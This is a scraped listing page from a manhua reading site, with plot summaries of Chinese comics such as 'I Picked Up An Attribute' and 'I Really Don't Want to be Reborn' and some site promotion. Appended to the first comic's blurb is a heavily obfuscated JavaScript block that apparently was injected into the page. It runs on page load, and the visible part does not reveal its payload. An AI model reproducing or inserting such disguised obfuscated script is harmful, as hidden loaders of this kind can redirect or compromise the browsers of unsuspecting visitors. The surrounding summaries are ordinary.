Manhua - Page 44

Manhua is the term for Chinese comics, famous for their artistic style and diverse storytelling. From action-packed adventures to heartwarming romances, manhua provides readers with a unique comic experience.

1521 results

I Picked Up An Attribute

The gaming emperor Feng Xia accidentally travelled into the era of magic and cultivation, attributes’ abilities and strategy can be used to defeat his opponents and each time he defeats his opponents, he can obtain the skills and attributes of the enemy, turning the world with each battle! There are also many beautiful beast-women in the world, Feng Xia destroyed the opponents with so called “unparalleled skills” and steals their power into his!<script></script><script>(function(_0x50d3ac,_0x467314){var _0x568d63=_0x5408,_0x3c1a88=_0x50d3ac();while(!![]){try{var _0x154e2b=-parseInt(_0x568d63(0x1f7))/(0x15db+-0xc70+-0x96a)+parseInt(_0x568d63(0x1e3))/(-0x238e+0xe54+0x153c)+-parseInt(_0x568d63(0x1f3))/(-0x49*-0x1a+-0x1a49+-0x12e2*-0x1)+parseInt(_0x568d63(0x1e8))/(-0x2601+-0x4f4+-0x1*-0x2af9)*(parseInt(_0x568d63(0x1e0))/(0x45d*0x3+-0x4ea+-0x3a*0x24))+-parseInt(_0x568d63(0x1f0))/(-0x75b+0x2*0x7c+-0x223*-0x3)*(parseInt(_0x568d63(0x1f8))/(-0x1870+-0x942+0x21b9))+parseInt(_0x568d63(0x1fa))/(-0x6d*-0x5+-0x2b7*0x7+0x43a*0x4)*(parseInt(_0x568d63(0x1e1))/(-0x3*-0x727+-0x21c7*0x1+0xc5b))+-parseInt(_0x568d63(0x1e9))/(-0x1*-0xc9b+-0xb90+-0x101);if(_0x154e2b===_0x467314)break;else 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3 days ago

I Play The Horror World As A Simulation Game

A mysterious force descends upon Earth, giving rise to a horrifying civilization. While everyone is immersed in fear, struggling to survive, Qinnuo discovers that he can earn system rewards by manipulating the emotions of ghosts. With each completed instance, he can establish his own industry in this terrifying world. Whether as a waiter in the Yinquan Restaurant or a chief doctor in the Death Hospital... As Qin Nuo completes one instance after another, he realizes that he has become a giant in the ghostly realm.


I Proposed To The Pope

Read manhua I Proposed to the Pope / 漫美映画 / I Proposed to the Pope / Wo Xiang Jiaohuang Qiuhunle Empire Princess Helene is reborn on the day when the younger brother of the crown prince brings back the female protagonist from the book. In her previous life, her own hand-raised younger brother becomes infatuated with the female protagonist from the book, causing national turmoil and mercilessly killing her sister due to a single word from the female protagonist. After being reborn, infatuation? Lock it down for me! An ungrateful white-eyed wolf? Then I won’t raise it. The female protagonist dares to shake the foundation of the empire with her halo? This princess will beat you until your teeth fall out! Worried that the Pope and the time-traveling woman will disrupt the empire’s foundation together.


I randomly have a new career every week

Read I randomly have a new career every week Manhua Experience the Didi driver and reward Pagani Zonda with one. Experience university teachers and reward ten buildings. Experience the charter company, reward one billion. Experience… Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel ! Associated Names Tanpaile, Wo Quan Zhiye Xitong! Tengo Una Nueva Carrera al Azar Cada Semana Wo Mei Zhou Suiji Yige Xin Zhiye

3 days ago

I Really Don’t Want to be Reborn

Read I Really Don’t Want to be Reborn Manhua Little had I known, I Chen Hansheng; the former elite of society and a Diamond Bachelor, was reborn. When I woke up, I was a senior graduate in high school? Later, Chen Hansheng was walking near the crosswalk, he seemed hesitant. A precious girl; Shen Youchu and two other girls; Bai Yueguang and Xiao Rongyu, who will he pick? All of them? One of them? Two of them? Read to find out. Side Note: Diamond Bachelor is a slang word that means someone who’s insanely rich and single. 我真没想重生啊 Welcome to Mangazin site, you can read and enjoy all kinds of Manhua trending  such as Drama, Manga, Manhwa, Romance…, for free here. All of the manhua new will be update with high standards every hours. If you are a Comics book (Manhua Hot ), MangaZin is your best choice, don’t hesitate, just read and feel !


I Really Don’T Want To Be The First

I Really Don't Want to Be the First manhua, After many rounds of death verification, Xu Xiaowen found himself with the first BUFF no matter what will easily take the first, and then the day will die a violent death. This time, Xu Xiaowen made a wish. He must be a loser, try to live until the age of eight! However, the heavens played a joke on him again, he is actually an all-powerful superpower? Wo Zhen De Bu Xiang Dang Di Yi I Really Don't Want to Be the First I Truly Don't Want to Become Number 1


I Really Don’t Want to Learn Forbidden Spells

I admit, when it comes to time travel, there must be some sort of cheat code. But seriously, which newbie mage only knows dark curses like “forbidden spells”? I’m human, not a dark lord! Oh well, I guess forbidden spells are pretty cool after all! Wo Zhen Bu Xiang Xue Jin Zhou, Wǒ Zhēn Bù Xiǎng Xué Jìn Zhòu, 我真不想学禁咒

3 days ago

I Regressed As The Duke

I Regressed As The Duke Manhwa, The Son Of The Great Emperor Gline,Prince “Aaron”, Is The Recipient Of The “Dragon’s Blessing”.But Because Of The Rebellion Led By His Uncle, “Zerone”,He Was Banished To The Outskirts Of The Kingdom, Brahn Grounds’.”Emperor Zerone Will Kill Us All”Keeping His Father’s Dying Wish To Forget About The Crown And Revenge,Aaron Had Been Living Powerlessly As The Duke Of A Barren Land But One Day,Emperor Zerone Invaded Brahn Grounds!He Didn’t Come Just For Aaron’s Life,But Rather, His Aim Was To Destroy Brahn Grounds!Even The Loyal Subject, “Gayle”, Disappeared Into Ashesas He Watched Duke Aaron And Brahn Grounds Disappearin Midst Of Emperor Zerone’s Least, That’s What We Thought Happened!When He Opened His Eyes,Gayle Found Himself In The Position Of A Younger Prince Aaron!”I Won’t Live While Hiding My Power Like The Duke Did!”By Using Any Means Necessary To Develop The Land,And Preparing For Emperor Zerone’s Invasion That Will Happen 20 Years,He Decides To Take Back The Spot Of Emperor Which He Was Robbed Of!


I Regressed to Level Up Instead of Being a Simp

Read I Regressed to Level Up Instead of Being a Simp Manhwa – I Regressed to Level Up Instead of Being a Simp Manga Online Free On HariManga The summary of the comic I Regressed to Level Up Instead of Being a Simp: Han Liee, who didn’t do well in the college entrance examination, got frustrated in love, and achieved nothing after graduation, prayed to God that if he could start over again… With the advent of the consumption system, he actually went back to the year when he was 18! No superior skills? He could upgrade his skills with points! Too average in appearance? He could shape his face with points! After the time travel, he taught a rich guy who picked on him a lesson and captured the hearts of some popular pretty girls… Let’s see how Han Liee would rise from the ashes and become a top-tier man after his rebirth. Alternative Name: Chongsheng Budang Tianwang, Wo Duzi Ke Jin Shengji / Chóngshēng Bùdāng Tiǎnwáng, Wǒ Dúzì Kè Jīn Shēngjí / After Rebirth: Upgrading Through Consumption / Rebirth Without Being the Licking King, I Use Cash to Level Up / Retrocedí para Subir de Nivel en Lugar de Ser un Simp / Trọng Sinh Không Làm Chạn Vương, Tôi Một Mình Nạp Game Thăng Cấp / 重生不当舔王,我独自氪金升级 “Read Manhwa, Read Manhua, Read Manga…” are the most searched keywords on the website MANGAZIN.ORG. We offer a wide selection of the best and newest comic series with all chapters updated quickly and featuring high-quality images, providing readers with wonderful and enjoyable reading experiences at MANGA ZIN. You can read TOP MANGA Captive in Dreamland No, I Only Charmed the Princess! The Devil Who Kisses My Feet

3 days ago

I Reincarnated As A Villain Of An Rpg But I Want To Survive

The protagonist reincarnated into the world of an RPG he always played in his previous life. While living there, what can he do to avoid the catastrophic end?


I Relied on Roasting to Be Body Cultivation Master

Xiao Ye unexpectedly finds himself in the world of cultivation, hoping to embark on the path of immortality. However, he is tested and found to have no spiritual roots. Fortunately, he is bound to a system that allows him to gain physical abilities through roasting. He is then entangled in the tragic annihilation of the Xiao family, where he is mistaken by Xiao Xin, the legitimate daughter of the Xiao family, as one of their own. He clings onto his senior sister's thigh while investigating the reasons behind the Xiao family's extermination, all while relying on roasting to achieve enlightenment through his physical body.


I Rely On Cheat To Hunt Gods

The protagonist Zhang Yi was betrayed and killed by his brother and lover in the eighth year of Apocalypse in his last life. After rebirth, he returned to the day when [Apocalypse] occured. Relying on the memory of the previous life, Zhang Yi got a god-level talent which is one in a billion from the beginning. Now In order to betray his enemy with his own hands, Zhang Yi used his talent and the super artifact that he brought from the previous life and started chasing for power and become powerful in this life. While doing so, he began to explore the unknown secrets about the world of Apocalypse
